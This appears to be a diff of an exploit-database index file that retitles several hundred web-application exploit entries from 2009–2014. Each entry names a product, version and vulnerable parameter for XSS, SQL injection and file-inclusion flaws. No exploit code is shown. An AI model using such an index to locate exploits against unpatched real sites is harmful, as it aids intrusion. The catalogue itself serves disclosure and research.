33371,platforms/php/webapps/33371.txt,"WordPress Plugin WP-Cumulus 1.x - 'tagcloud.swf' Cross-Site Scripting",2009-11-09,MustLive,php,webapps,0 33372,platforms/php/webapps/33372.html,"WordPress Plugin Fuctweb CapCC 1.0 CAPTCHA - Security Bypass",2009-11-13,MustLive,php,webapps,0 33373,platforms/php/webapps/33373.txt,"WordPress Plugin Subscribe to Comments 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2009-11-16,MustLive,php,webapps,0 -33374,platforms/php/webapps/33374.txt,"Cacti 0.8.x - graph.php Multiple Parameter Cross-Site Scripting",2009-11-21,"Moritz Naumann",php,webapps,0 +33374,platforms/php/webapps/33374.txt,"Cacti 0.8.x - 'graph.php' Multiple Cross-Site Scripting Vulnerabilities",2009-11-21,"Moritz Naumann",php,webapps,0 33375,platforms/php/webapps/33375.txt,"Quick.Cart 3.4 / Quick.CMS 2.4 - Delete Function Cross-Site Request Forgery",2009-11-24,"Alice Kaerast",php,webapps,0 33376,platforms/php/webapps/33376.pl,"klinza Professional CMS 5.0.1 - 'menulast.php' Local File Inclusion",2009-11-24,klinza,php,webapps,0 33377,platforms/php/webapps/33377.txt,"Joomla! Component ProofReader 1.0 RC9 - Cross-Site Scripting",2009-11-16,MustLive,php,webapps,0 33378,platforms/php/webapps/33378.txt,"Joomla! 1.5.x - 404 Error Page Cross-Site Scripting",2009-11-23,MustLive,php,webapps,0 33380,platforms/php/webapps/33380.txt,"Power Phlogger 2.2.x - Cross-Site Scripting",2008-02-16,MustLive,php,webapps,0 -33381,platforms/php/webapps/33381.txt,"Content Module 0.5 for XOOPS - 'id' Parameter SQL Injection",2009-11-30,s4r4d0,php,webapps,0 -33382,platforms/php/webapps/33382.txt,"SmartMedia Module 0.85 Beta for XOOPS - 'categoryId' Parameter Cross-Site Scripting",2009-11-30,SoldierOfAllah,php,webapps,0 -33383,platforms/php/webapps/33383.txt,"Elxis - 'Filename' Parameter Directory Traversal",2009-11-30,cr4wl3r,php,webapps,0 +33381,platforms/php/webapps/33381.txt,"Content Module 0.5 for XOOPS - 'id' SQL Injection",2009-11-30,s4r4d0,php,webapps,0 +33382,platforms/php/webapps/33382.txt,"SmartMedia Module 0.85 Beta for XOOPS - 'categoryId' Cross-Site Scripting",2009-11-30,SoldierOfAllah,php,webapps,0 +33383,platforms/php/webapps/33383.txt,"Elxis - 'Filename' Directory Traversal",2009-11-30,cr4wl3r,php,webapps,0 33385,platforms/php/webapps/33385.txt,"phpMyFAQ < 2.5.4 - Multiple Cross-Site Scripting Vulnerabilities",2009-12-01,"Amol Naik",php,webapps,0 33389,platforms/php/webapps/33389.txt,"eGroupWare 1.8.006 - Multiple Vulnerabilities",2014-05-16,"High-Tech Bridge SA",php,webapps,80 33390,platforms/php/webapps/33390.txt,"WordPress Plugin Yoast Google Analytics 3.2.4 - 404 Error Page Cross-Site Scripting",2009-12-04,intern0t,php,webapps,0 33391,platforms/php/webapps/33391.txt,"Advanced Image Hosting Script 2.x - 'search.php' Cross-Site Scripting",2009-12-07,"aBo MoHaMeD",php,webapps,0 -33392,platforms/php/webapps/33392.txt,"Joomla! Component YOOtheme Warp5 - 'yt_color' Parameter Cross-Site Scripting",2009-12-04,andresg888,php,webapps,0 +33392,platforms/php/webapps/33392.txt,"Joomla! Component YOOtheme Warp5 - 'yt_color' Cross-Site Scripting",2009-12-04,andresg888,php,webapps,0 33393,platforms/php/webapps/33393.txt,"Joomla! Component You!Hostit! 1.0.1 Template - Cross-Site Scripting",2009-12-04,andresg888,php,webapps,0 33394,platforms/php/webapps/33394.txt,"Invision Power Board 3.0.3 - '.txt' MIME-Type Cross-Site Scripting",2009-12-09,Xacker,php,webapps,0 33396,platforms/php/webapps/33396.txt,"Zeeways ZeeJobsite - 'basic_search_result.php' Cross-Site Scripting",2009-12-10,bi0,php,webapps,0 -33400,platforms/php/webapps/33400.txt,"Ez Cart - 'sid' Parameter Cross-Site Scripting",2009-12-14,anti-gov,php,webapps,0 +33400,platforms/php/webapps/33400.txt,"Ez Cart - 'sid' Cross-Site Scripting",2009-12-14,anti-gov,php,webapps,0 33435,platforms/php/webapps/33435.txt,"ClarkConnect Linux 5.0 - 'proxy.php' Cross-Site Scripting",2009-12-22,"Edgard Chammas",php,webapps,0 -33436,platforms/php/webapps/33436.txt,"PHP-Calendar 1.1 - update08.php configfile Parameter Traversal Local File Inclusion",2009-12-21,"Juan Galiana Lara",php,webapps,0 -33437,platforms/php/webapps/33437.txt,"PHP-Calendar 1.1 - update10.php configfile Parameter Traversal Local File Inclusion",2009-12-21,"Juan Galiana Lara",php,webapps,0 +33436,platforms/php/webapps/33436.txt,"PHP-Calendar 1.1 - 'update08.php?configfile' Traversal Local File Inclusion",2009-12-21,"Juan Galiana Lara",php,webapps,0 +33437,platforms/php/webapps/33437.txt,"PHP-Calendar 1.1 - 'update10.php?configfile' Traversal Local File Inclusion",2009-12-21,"Juan Galiana Lara",php,webapps,0 33438,platforms/multiple/webapps/33438.txt,"webMathematica 3 - 'MSP' Script Cross-Site Scripting",2009-12-23,"Floyd Fuh",multiple,webapps,0 33439,platforms/php/webapps/33439.txt,"MyBB 1.4.10 - 'myps.php' Cross-Site Scripting",2009-12-24,"Steven Abbagnaro",php,webapps,0 -33440,platforms/php/webapps/33440.txt,"Joomla! Component iF Portfolio Nexus - 'Controller' Parameter Remote File Inclusion",2009-12-29,F10riX,php,webapps,0 +33440,platforms/php/webapps/33440.txt,"Joomla! Component iF Portfolio Nexus - 'Controller' Remote File Inclusion",2009-12-29,F10riX,php,webapps,0 33441,platforms/php/webapps/33441.txt,"Joomla! Component Joomulus 2.0 - 'tagcloud.swf' Cross-Site Scripting",2009-12-28,MustLive,php,webapps,0 -33442,platforms/php/webapps/33442.txt,"FreePBX 2.5.2 - admin/config.php tech Parameter Cross-Site Scripting",2009-12-28,Global-Evolution,php,webapps,0 +33442,platforms/php/webapps/33442.txt,"FreePBX 2.5.2 - 'admin/config.php?tech' Cross-Site Scripting",2009-12-28,Global-Evolution,php,webapps,0 33443,platforms/php/webapps/33443.txt,"FreePBX 2.5.2 - Zap Channel Addition Description Parameter Cross-Site Scripting",2009-12-28,Global-Evolution,php,webapps,0 33445,platforms/php/webapps/33445.txt,"PHPInstantGallery 1.1 - 'admin.php' Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 33446,platforms/php/webapps/33446.txt,"Barbo91 - 'upload.php' Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 33447,platforms/php/webapps/33447.php,"FreeWebShop 2.2.9 R2 - Multiple Remote Vulnerabilities",2009-12-29,"Akita Software Security",php,webapps,0 -33448,platforms/php/webapps/33448.txt,"AzDGDatingMedium 1.9.3 - 'l' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-12-29,indoushka,php,webapps,0 +33448,platforms/php/webapps/33448.txt,"AzDGDatingMedium 1.9.3 - 'l' Multiple Cross-Site Scripting Vulnerabilities",2009-12-29,indoushka,php,webapps,0 33449,platforms/php/webapps/33449.txt,"PHPMyCart 1.3 - Cross-Site Scripting / Authentication Bypass",2009-12-31,indoushka,php,webapps,0 33450,platforms/php/webapps/33450.txt,"SendStudio 4.0.1 - Cross-Site Scripting / Security Bypass",2009-12-31,indoushka,php,webapps,0 33451,platforms/php/webapps/33451.txt,"BosClassifieds 1.20 - 'recent.php' Cross-Site Scripting",2009-12-31,indoushka,php,webapps,0 -33452,platforms/php/webapps/33452.txt,"Imagevue r16 - 'amount' Parameter Cross-Site Scripting",2009-12-31,indoushka,php,webapps,0 +33452,platforms/php/webapps/33452.txt,"Imagevue r16 - 'amount' Cross-Site Scripting",2009-12-31,indoushka,php,webapps,0 33455,platforms/hardware/webapps/33455.txt,"Binatone DT 850W Wireless Router - Multiple Cross-Site Request Forgery Vulnerabilities",2014-05-21,"Samandeep Singh",hardware,webapps,0 -33456,platforms/php/webapps/33456.txt,"StarDevelop Live Help 2.6 - 'SERVER' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-12-31,indoushka,php,webapps,0 +33456,platforms/php/webapps/33456.txt,"StarDevelop Live Help 2.6 - 'SERVER' Multiple Cross-Site Scripting Vulnerabilities",2009-12-31,indoushka,php,webapps,0 33457,platforms/php/webapps/33457.txt,"PhotoKorn 1.542 - Cross-Site Scripting / Remote File Inclusion",2009-12-31,indoushka,php,webapps,0 -33458,platforms/php/webapps/33458.txt,"Discuz! 1.0 - 'referer' Parameter Cross-Site Scripting",2009-12-31,indoushka,php,webapps,0 +33458,platforms/php/webapps/33458.txt,"Discuz! 1.0 - 'referer' Cross-Site Scripting",2009-12-31,indoushka,php,webapps,0 33459,platforms/php/webapps/33459.txt,"DieselPay 1.6 - Cross-Site Scripting / Directory Traversal",2009-12-31,indoushka,php,webapps,0 33460,platforms/php/webapps/33460.txt,"Reamday Enterprises Magic News Plus 1.0.2 - Cross-Site Scripting",2010-01-01,indoushka,php,webapps,0 33461,platforms/php/webapps/33461.txt,"PHPCart 3.1.2 - 'search.php' Cross-Site Scripting",2010-01-01,indoushka,php,webapps,0 33462,platforms/php/webapps/33462.txt,"VirtuaSystems VirtuaNews Pro 1.0.4 - 'admin.php' Cross-Site Scripting",2010-01-01,indoushka,php,webapps,0 33463,platforms/php/webapps/33463.txt,"VisionGate 1.6 - 'login.php' Cross-Site Scripting",2010-01-01,indoushka,php,webapps,0 33464,platforms/php/webapps/33464.txt,"Discuz! 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-03,indoushka,php,webapps,0 -33465,platforms/php/webapps/33465.txt,"SLAED CMS 2.0 - 'stop' Parameter Cross-Site Scripting",2010-01-03,indoushka,php,webapps,0 +33465,platforms/php/webapps/33465.txt,"SLAED CMS 2.0 - 'stop' Cross-Site Scripting",2010-01-03,indoushka,php,webapps,0 33466,platforms/php/webapps/33466.txt,"pL-PHP 0.9 - 'index.php' Cross-Site Scripting",2010-01-04,indoushka,php,webapps,0 33467,platforms/php/webapps/33467.txt,"WMNews - 'admin/wmnews.php' Cross-Site Scripting",2010-01-04,indoushka,php,webapps,0 33468,platforms/php/webapps/33468.txt,"MercuryBoard 1.1.5 - 'index.php' Cross-Site Scripting",2010-01-04,indoushka,php,webapps,0 33469,platforms/php/webapps/33469.txt,"LXR 0.9.x - Cross Referencer Multiple Cross-Site Scripting Vulnerabilities",2010-01-05,"Dan Rosenberg",php,webapps,0 33470,platforms/php/webapps/33470.txt,"LineWeb 1.0.5 - Multiple Remote Vulnerabilities",2010-01-05,"Ignacio Garrido",php,webapps,0 33473,platforms/php/webapps/33473.txt,"Roundcube Webmail 0.2 - Cross-Site Scripting",2010-01-06,"j4ck and Globus",php,webapps,0 -33474,platforms/php/webapps/33474.txt,"Joomla! Component DM Orders - 'id' Parameter SQL Injection",2010-01-07,NoGe,php,webapps,0 +33474,platforms/php/webapps/33474.txt,"Joomla! Component DM Orders - 'id' SQL Injection",2010-01-07,NoGe,php,webapps,0 33475,platforms/php/webapps/33475.txt,"dotProject 2.1.3 - Multiple SQL Injections / HTML Injection Vulnerabilities",2010-01-07,"Justin C. Klein Keane",php,webapps,0 -33478,platforms/php/webapps/33478.txt,"Joomla! Component Jobads - 'type' Parameter SQL Injection",2010-01-08,N0KT4,php,webapps,0 -33482,platforms/php/webapps/33482.txt,"DigitalHive - 'mt' Parameter Cross-Site Scripting",2010-01-10,ViRuSMaN,php,webapps,0 -33484,platforms/php/webapps/33484.txt,"DELTAScripts PHP Links 1.0 - 'email' Parameter Cross-Site Scripting",2010-01-11,Crux,php,webapps,0 -33485,platforms/php/webapps/33485.txt,"Jamit Job Board - 'post_id' Parameter Cross-Site Scripting",2010-01-11,Crux,php,webapps,0 +33478,platforms/php/webapps/33478.txt,"Joomla! Component Jobads - 'type' SQL Injection",2010-01-08,N0KT4,php,webapps,0 +33482,platforms/php/webapps/33482.txt,"DigitalHive - 'mt' Cross-Site Scripting",2010-01-10,ViRuSMaN,php,webapps,0 +33484,platforms/php/webapps/33484.txt,"DELTAScripts PHP Links 1.0 - 'email' Cross-Site Scripting",2010-01-11,Crux,php,webapps,0 +33485,platforms/php/webapps/33485.txt,"Jamit Job Board - 'post_id' Cross-Site Scripting",2010-01-11,Crux,php,webapps,0 33486,platforms/php/webapps/33486.txt,"@lex Guestbook 5.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-11,"D3V!L FUCKER",php,webapps,0 33487,platforms/php/webapps/33487.txt,"PHPepperShop 2.5 - 'USER_ARTIKEL_HANDLING_AUFRUF.php' Cross-Site Scripting",2010-01-12,Crux,php,webapps,0 33488,platforms/php/webapps/33488.txt,"Active Calendar 1.2 - '$_SERVER['PHP_SELF']' Multiple Cross-Site Scripting Vulnerabilities",2010-01-11,"Martin Barbella",php,webapps,0 -33493,platforms/multiple/webapps/33493.txt,"Mayan-EDms web-based document management OS system - Multiple Persistent Cross-Site Scripting",2014-05-24,"Dolev Farhi",multiple,webapps,0 +33493,platforms/multiple/webapps/33493.txt,"Mayan-EDms web-based document management OS system - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-05-24,"Dolev Farhi",multiple,webapps,0 33494,platforms/cgi/webapps/33494.txt,"Web Terra 1.1 - books.cgi Remote Command Execution",2014-05-24,"felipe andrian",cgi,webapps,0 -33582,platforms/php/webapps/33582.txt,"Joomla! Component com_rsgallery2 2.0 - 'catid' Parameter SQL Injection",2010-01-31,snakespc,php,webapps,0 -33505,platforms/php/webapps/33505.txt,"Docmint 1.0/2.1 - 'id' Parameter Cross-Site Scripting",2010-01-12,Red-D3v1L,php,webapps,0 +33582,platforms/php/webapps/33582.txt,"Joomla! Component com_rsgallery2 2.0 - 'catid' SQL Injection",2010-01-31,snakespc,php,webapps,0 +33505,platforms/php/webapps/33505.txt,"Docmint 1.0/2.1 - 'id' Cross-Site Scripting",2010-01-12,Red-D3v1L,php,webapps,0 33507,platforms/php/webapps/33507.txt,"Simple PHP Blog 0.5.x - 'search.php' Cross-Site Scripting",2010-01-12,Sora,php,webapps,0 -33509,platforms/php/webapps/33509.txt,"Joomla! Component com_tienda - 'categoria' Parameter Cross-Site Scripting",2010-01-13,FL0RiX,php,webapps,0 -33510,platforms/php/webapps/33510.txt,"Tribisur - 'cat' Parameter Cross-Site Scripting",2010-01-13,ViRuSMaN,php,webapps,0 +33509,platforms/php/webapps/33509.txt,"Joomla! Component com_tienda - 'categoria' Cross-Site Scripting",2010-01-13,FL0RiX,php,webapps,0 +33510,platforms/php/webapps/33510.txt,"Tribisur - 'cat' Cross-Site Scripting",2010-01-13,ViRuSMaN,php,webapps,0 33511,platforms/multiple/webapps/33511.txt,"Zenoss 2.3.3 - Multiple SQL Injections",2010-01-14,"nGenuity Information Services",multiple,webapps,0 33514,platforms/php/webapps/33514.txt,"Videos Tube 1.0 - Multiple SQL Injections",2014-05-26,"Mustafa ALTINKAYNAK",php,webapps,80 33646,platforms/php/webapps/33646.txt,"Joomla! Component MS Comment 0.8.0b - Security Bypass / Cross-Site Scripting Vulnerabilities",2009-12-31,"Jeff Channell",php,webapps,0 33518,platforms/hardware/webapps/33518.txt,"ZYXEL P-660HW-T1 3 Wireless Router - Cross-Site Request Forgery",2014-05-26,"Mustafa ALTINKAYNAK",hardware,webapps,80 33520,platforms/hardware/webapps/33520.txt,"D-Link Routers - Multiple Vulnerabilities",2014-05-26,"Kyle Lovett",hardware,webapps,80 -33574,platforms/php/webapps/33574.txt,"Discuz! 6.0 - 'tid' Parameter Cross-Site Scripting",2010-01-27,s4r4d0,php,webapps,0 +33574,platforms/php/webapps/33574.txt,"Discuz! 6.0 - 'tid' Cross-Site Scripting",2010-01-27,s4r4d0,php,webapps,0 33575,platforms/cfm/webapps/33575.txt,"CommonSpot Server - 'utilities/longproc.cfm' Cross-Site Scripting",2010-01-28,"Richard Brain",cfm,webapps,0 -33526,platforms/php/webapps/33526.txt,"Technology for Solutions 1.0 - 'id' Parameter Cross-Site Scripting",2010-01-14,PaL-D3v1L,php,webapps,0 -33528,platforms/php/webapps/33528.txt,"Xforum 1.4 - 'nbpageliste' Parameter Cross-Site Scripting",2010-01-14,ViRuSMaN,php,webapps,0 -33529,platforms/php/webapps/33529.txt,"Joomla! Component com_marketplace 1.2 - 'catid' Parameter Cross-Site Scripting",2010-01-14,ViRuSMaN,php,webapps,0 -33530,platforms/php/webapps/33530.txt,"LetoDms 1.4.x - 'lang' Parameter Local File Inclusion",2010-01-15,"D. Fabian",php,webapps,0 -33534,platforms/php/webapps/33534.txt,"TestLink 1.8.5 - 'order_by_login_dir' Parameter Cross-Site Scripting",2010-01-18,"Prashant Khandelwal",php,webapps,0 +33526,platforms/php/webapps/33526.txt,"Technology for Solutions 1.0 - 'id' Cross-Site Scripting",2010-01-14,PaL-D3v1L,php,webapps,0 +33528,platforms/php/webapps/33528.txt,"Xforum 1.4 - 'nbpageliste' Cross-Site Scripting",2010-01-14,ViRuSMaN,php,webapps,0 +33529,platforms/php/webapps/33529.txt,"Joomla! Component com_marketplace 1.2 - 'catid' Cross-Site Scripting",2010-01-14,ViRuSMaN,php,webapps,0 +33530,platforms/php/webapps/33530.txt,"LetoDms 1.4.x - 'lang' Local File Inclusion",2010-01-15,"D. Fabian",php,webapps,0 +33534,platforms/php/webapps/33534.txt,"TestLink 1.8.5 - 'order_by_login_dir' Cross-Site Scripting",2010-01-18,"Prashant Khandelwal",php,webapps,0 33636,platforms/php/webapps/33636.sh,"Interspire Knowledge Manager 5 - 'callback.snipshot.php' Arbitrary File Creation",2010-02-03,"Cory Marsh",php,webapps,0 33637,platforms/php/webapps/33637.txt,"Joomla! Component Webee Comments 1.1/1.2 - index2.php articleId SQL Injection",2009-11-15,"Jeff Channell",php,webapps,0 -33638,platforms/php/webapps/33638.txt,"Joomla! Component Webee Comments 1.1/1.2 - Multiple BBCode Tags Cross-Site Scripting",2009-11-15,"Jeff Channell",php,webapps,0 +33638,platforms/php/webapps/33638.txt,"Joomla! Component Webee Comments 1.1/1.2 - Multiple BBCode Tags Cross-Site Scripting Vulnerabilities",2009-11-15,"Jeff Channell",php,webapps,0 33639,platforms/php/webapps/33639.txt,"Joomla! Component EasyBook 2.0.0rc4 - Multiple HTML Injection Vulnerabilities",2009-09-17,"Jeff Channell",php,webapps,0 33634,platforms/php/webapps/33634.txt,"CommodityRentals CD Rental Software - 'index.php' SQL Injection",2010-02-11,"Don Tukulesto",php,webapps,0 -33541,platforms/php/webapps/33541.txt,"DataLife Engine 8.3 - engine/inc/include/init.php selected_language Parameter Remote File Inclusion",2010-01-19,indoushka,php,webapps,0 -33542,platforms/php/webapps/33542.txt,"DataLife Engine 8.3 - engine/inc/help.php config[langs] Parameter Remote File Inclusion",2010-01-19,indoushka,php,webapps,0 -33543,platforms/php/webapps/33543.txt,"DataLife Engine 8.3 - engine/ajax/pm.php config[lang] Parameter Remote File Inclusion",2010-01-19,indoushka,php,webapps,0 -33544,platforms/php/webapps/33544.txt,"DataLife Engine 8.3 - engine/ajax/addcomments.php _REQUEST[skin] Parameter Remote File Inclusion",2010-01-19,indoushka,php,webapps,0 -33545,platforms/php/webapps/33545.txt,"Easysitenetwork Jokes Complete Website - 'id' Parameter Cross-Site Scripting",2010-01-18,indoushka,php,webapps,0 -33546,platforms/php/webapps/33546.txt,"Easysitenetwork Jokes Complete Website - 'searchingred' Parameter Cross-Site Scripting",2010-01-18,indoushka,php,webapps,0 +33541,platforms/php/webapps/33541.txt,"DataLife Engine 8.3 - 'engine/inc/include/init.php?selected_language' Remote File Inclusion",2010-01-19,indoushka,php,webapps,0 +33542,platforms/php/webapps/33542.txt,"DataLife Engine 8.3 - 'engine/inc/help.php?config[langs]' Remote File Inclusion",2010-01-19,indoushka,php,webapps,0 +33543,platforms/php/webapps/33543.txt,"DataLife Engine 8.3 - 'engine/ajax/pm.php?config[lang]' Remote File Inclusion",2010-01-19,indoushka,php,webapps,0 +33544,platforms/php/webapps/33544.txt,"DataLife Engine 8.3 - 'engine/ajax/addcomments.php?_REQUEST[skin]' Remote File Inclusion",2010-01-19,indoushka,php,webapps,0 +33545,platforms/php/webapps/33545.txt,"Easysitenetwork Jokes Complete Website - 'id' Cross-Site Scripting",2010-01-18,indoushka,php,webapps,0 +33546,platforms/php/webapps/33546.txt,"Easysitenetwork Jokes Complete Website - 'searchingred' Cross-Site Scripting",2010-01-18,indoushka,php,webapps,0 33547,platforms/php/webapps/33547.pl,"vBulletin 4.0.1 - 'misc.php' SQL Injection",2010-01-18,indoushka,php,webapps,0 33550,platforms/php/webapps/33550.txt,"VisualShapers EZContents 2.0.3 - Authentication Bypass / Multiple SQL Injections",2010-01-19,"AmnPardaz Security Research Team",php,webapps,0 -33551,platforms/php/webapps/33551.txt,"PHPMySpace Gold 8.0 - 'gid' Parameter SQL Injection",2010-01-20,Ctacok,php,webapps,0 +33551,platforms/php/webapps/33551.txt,"PHPMySpace Gold 8.0 - 'gid' SQL Injection",2010-01-20,Ctacok,php,webapps,0 33555,platforms/php/webapps/33555.txt,"AuraCMS 3.0 - Multiple Vulnerabilities",2014-05-28,"Mustafa ALTINKAYNAK",php,webapps,0 33557,platforms/php/webapps/33557.txt,"Sharetronix 3.3 - Multiple Vulnerabilities",2014-05-28,"High-Tech Bridge SA",php,webapps,80 -33558,platforms/php/webapps/33558.txt,"cPanel and WHM 11.25 - 'failurl' Parameter HTTP Response Splitting",2010-01-21,Trancer,php,webapps,0 +33558,platforms/php/webapps/33558.txt,"cPanel and WHM 11.25 - 'failurl' HTTP Response Splitting",2010-01-21,Trancer,php,webapps,0 33561,platforms/php/webapps/33561.txt,"OpenX 2.6.1 - SQL Injection",2010-01-22,AndySoon,php,webapps,0 33564,platforms/jsp/webapps/33564.txt,"Jetty 6.1.x - JSP Snoop Page Multiple Cross-Site Scripting Vulnerabilities",2009-10-24,aScii,jsp,webapps,0 40752,platforms/php/webapps/40752.py,"InvoicePlane 1.4.8 - Password Reset",2016-11-11,feedersec,php,webapps,0 33566,platforms/php/webapps/33566.txt,"Joomla! Component 3D Cloud - 'tagcloud.swf' Cross-Site Scripting",2010-01-26,MustLive,php,webapps,0 -33586,platforms/php/webapps/33586.txt,"Joomla! Component com_gambling - 'gamblingEvent' Parameter SQL Injection",2010-02-01,md.r00t,php,webapps,0 +33586,platforms/php/webapps/33586.txt,"Joomla! Component com_gambling - 'gamblingEvent' SQL Injection",2010-02-01,md.r00t,php,webapps,0 33595,platforms/php/webapps/33595.txt,"Interspire Knowledge Manager < 5.1.3 - Multiple Remote Vulnerabilities",2010-02-04,"Cory Marsh",php,webapps,0 33596,platforms/jsp/webapps/33596.txt,"KnowGate hipergate 4.0.12 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-04,"Nahuel Grisolia",jsp,webapps,0 33597,platforms/php/webapps/33597.txt,"Data 1 Systems UltraBB 1.17 - 'view_post.php' Cross-Site Scripting",2010-02-04,s4r4d0,php,webapps,0 33602,platforms/php/webapps/33602.txt,"evalSMSI 2.1.3 - Multiple Input Validation Vulnerabilities",2010-02-05,ekse,php,webapps,0 33603,platforms/php/webapps/33603.html,"LANDesk Management Gateway 4.x - Multiple Vulnerabilities",2010-02-05,"Aureliano Calvo",php,webapps,0 -33605,platforms/php/webapps/33605.php,"ASCET Interactive Huski CMS - 'i' Parameter Local File Inclusion",2010-02-05,Wireghoul,php,webapps,0 +33605,platforms/php/webapps/33605.php,"ASCET Interactive Huski CMS - 'i' Local File Inclusion",2010-02-05,Wireghoul,php,webapps,0 33606,platforms/php/webapps/33606.txt,"ASCET Interactive Huski Retail - Multiple SQL Injections",2010-02-05,Wireghoul,php,webapps,0 33613,platforms/php/webapps/33613.txt,"WordPress Plugin Participants Database 1.5.4.8 - SQL Injection",2014-06-02,"Yarubo Research Team",php,webapps,80 33617,platforms/php/webapps/33617.txt,"Aflam Online 1.0 - 'index.php' SQL Injection",2010-02-08,alnjm33,php,webapps,0 @@ -33765,37 +33766,37 @@ id,file,description,date,author,platform,type,port 33631,platforms/ios/webapps/33631.txt,"AllReader 1.0 iOS - Multiple Vulnerabilities",2014-06-03,Vulnerability-Lab,ios,webapps,8080 33632,platforms/ios/webapps/33632.txt,"Bluetooth Photo-File Share 2.1 iOS - Multiple Vulnerabilities",2014-06-03,Vulnerability-Lab,ios,webapps,8080 33633,platforms/windows/webapps/33633.txt,"IPSwitch IMail Server WEB client 12.4 - Persistent Cross-Site Scripting",2014-06-03,Peru,windows,webapps,0 -33644,platforms/php/webapps/33644.txt,"Basic-CMS - 'nav_id' Parameter Cross-Site Scripting",2010-02-12,Red-D3v1L,php,webapps,0 +33644,platforms/php/webapps/33644.txt,"Basic-CMS - 'nav_id' Cross-Site Scripting",2010-02-12,Red-D3v1L,php,webapps,0 33641,platforms/php/webapps/33641.txt,"Joomla! Component F!BB 1.5.96 RC - SQL Injection / HTML Injection",2009-09-17,"Jeff Channell",php,webapps,0 33643,platforms/php/webapps/33643.txt,"CMS Made Simple 1.6.6 - Local File Inclusion / Cross-Site Scripting",2010-02-12,"Beenu Arora",php,webapps,0 33647,platforms/asp/webapps/33647.txt,"Portrait Software Portrait Campaign Manager 4.6.1.22 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-16,"Roel Schouten",asp,webapps,0 -33649,platforms/php/webapps/33649.txt,"BGSvetionik BGS CMS - 'search' Parameter Cross-Site Scripting",2010-02-16,hacker@sr.gov.yu,php,webapps,0 -33650,platforms/php/webapps/33650.txt,"Extreme Mobster - 'login' Parameter Cross-Site Scripting",2010-02-16,indoushka,php,webapps,0 +33649,platforms/php/webapps/33649.txt,"BGSvetionik BGS CMS - 'search' Cross-Site Scripting",2010-02-16,hacker@sr.gov.yu,php,webapps,0 +33650,platforms/php/webapps/33650.txt,"Extreme Mobster - 'login' Cross-Site Scripting",2010-02-16,indoushka,php,webapps,0 33651,platforms/php/webapps/33651.txt,"EziScript Google Page Rank 1.1 - Cross-Site Scripting",2010-02-16,sarabande,php,webapps,0 33652,platforms/php/webapps/33652.txt,"New-CMS 1.08 - Multiple Local File Inclusion / HTML Injection Vulnerabilities",2010-02-18,"Alberto Fontanella",php,webapps,0 33654,platforms/php/webapps/33654.py,"Madness Pro 1.14 - Persistent Cross-Site Scripting",2014-06-06,bwall,php,webapps,0 33655,platforms/php/webapps/33655.py,"Madness Pro 1.14 - SQL Injection",2014-06-06,bwall,php,webapps,0 33656,platforms/php/webapps/33656.txt,"XlentProjects SphereCMS 1.1 - 'archive.php' SQL Injection",2010-02-18,"AmnPardaz Security Research Team",php,webapps,0 -33657,platforms/php/webapps/33657.txt,"Subex Nikira Fraud Management System GUI - 'message' Parameter Cross-Site Scripting",2010-02-18,thebluegenius,php,webapps,0 +33657,platforms/php/webapps/33657.txt,"Subex Nikira Fraud Management System GUI - 'message' Cross-Site Scripting",2010-02-18,thebluegenius,php,webapps,0 33658,platforms/php/webapps/33658.txt,"Social Web CMS 2 - 'index.php' Cross-Site Scripting",2010-02-19,GoLdeN-z3r0,php,webapps,0 40343,platforms/php/webapps/40343.txt,"CumulusClips 2.4.1 - Multiple Vulnerabilities",2016-09-07,kor3k,php,webapps,80 33659,platforms/php/webapps/33659.txt,"Joomla! Component com_recipe - Multiple SQL Injections",2010-02-20,FL0RiX,php,webapps,0 33660,platforms/php/webapps/33660.txt,"vBulletin 4.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-20,indoushka,php,webapps,0 33661,platforms/php/webapps/33661.txt,"Galerie Dezign-Box - Multiple Input Validation Vulnerabilities",2010-02-22,indoushka,php,webapps,0 -33665,platforms/php/webapps/33665.txt,"Softbiz Jobs - 'sbad_type' Parameter Cross-Site Scripting",2010-02-23,"pratul agrawal",php,webapps,0 -33675,platforms/jsp/webapps/33675.txt,"Multiple IBM Products - Login Page Cross-Site Scripting",2010-02-25,"Oren Hafif",jsp,webapps,0 +33665,platforms/php/webapps/33665.txt,"Softbiz Jobs - 'sbad_type' Cross-Site Scripting",2010-02-23,"pratul agrawal",php,webapps,0 +33675,platforms/jsp/webapps/33675.txt,"IBM (Multiple Products) - Login Page Cross-Site Scripting",2010-02-25,"Oren Hafif",jsp,webapps,0 33676,platforms/php/webapps/33676.txt,"Newbie CMS 0.0.2 - Insecure Cookie Authentication Bypass",2010-02-25,JIKO,php,webapps,0 33678,platforms/jsp/webapps/33678.txt,"ARISg 5.0 - 'wflogin.jsp' Cross-Site Scripting",2010-02-26,"Yaniv Miron",jsp,webapps,0 -33673,platforms/php/webapps/33673.pl,"Joomla! Component HD FLV Player - 'id' Parameter SQL Injection",2010-02-24,kaMtiEz,php,webapps,0 -33674,platforms/php/webapps/33674.txt,"OpenInferno OI.Blogs 1.0 - Multiple Local File Inclusion",2010-02-24,JIKO,php,webapps,0 +33673,platforms/php/webapps/33673.pl,"Joomla! Component HD FLV Player - 'id' SQL Injection",2010-02-24,kaMtiEz,php,webapps,0 +33674,platforms/php/webapps/33674.txt,"OpenInferno OI.Blogs 1.0 - Multiple Local File Inclusions",2010-02-24,JIKO,php,webapps,0 33679,platforms/php/webapps/33679.txt,"TRUC 0.11 - 'login_reset_password_page.php' Cross-Site Scripting",2010-02-28,snakespc,php,webapps,0 -33680,platforms/php/webapps/33680.txt,"Open Educational System 0.1 Beta - 'CONF_INCLUDE_PATH' Parameter Multiple Remote File Inclusion",2010-02-28,cr4wl3r,php,webapps,0 +33680,platforms/php/webapps/33680.txt,"Open Educational System 0.1 Beta - 'CONF_INCLUDE_PATH' Multiple Remote File Inclusions",2010-02-28,cr4wl3r,php,webapps,0 33681,platforms/php/webapps/33681.txt,"SLAED CMS 4 - Installation Script Unauthorized Access",2010-02-27,indoushka,php,webapps,0 -33683,platforms/php/webapps/33683.txt,"Article Friendly - 'Filename' Parameter Local File 